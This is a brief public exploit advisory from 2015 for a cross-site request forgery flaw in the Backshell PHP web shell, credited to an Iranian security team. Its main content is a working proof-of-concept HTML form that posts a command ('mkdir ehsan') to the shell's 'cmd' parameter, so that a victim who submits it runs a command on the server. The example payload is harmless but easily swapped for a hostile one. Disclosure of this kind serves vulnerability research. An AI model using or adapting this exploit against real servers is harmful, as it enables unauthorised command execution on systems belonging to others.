================================================================================
# Backshell Web Shell - CSRF Command Injection
================================================================================
# Vendor Homepage: https://github.com/neitanod/backshell
# Date: 25/12/2015
# Software Link: https://github.com/neitanod/backshell/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/bshell-csrf-rce.txt
================================================================================
# Exploit :

<form action="http://localhost/a/bshell.php" method="post">
<input type="hidden" name="cmd" value="mkdir ehsan">
<input type="submit" value="submit">
</form>


================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================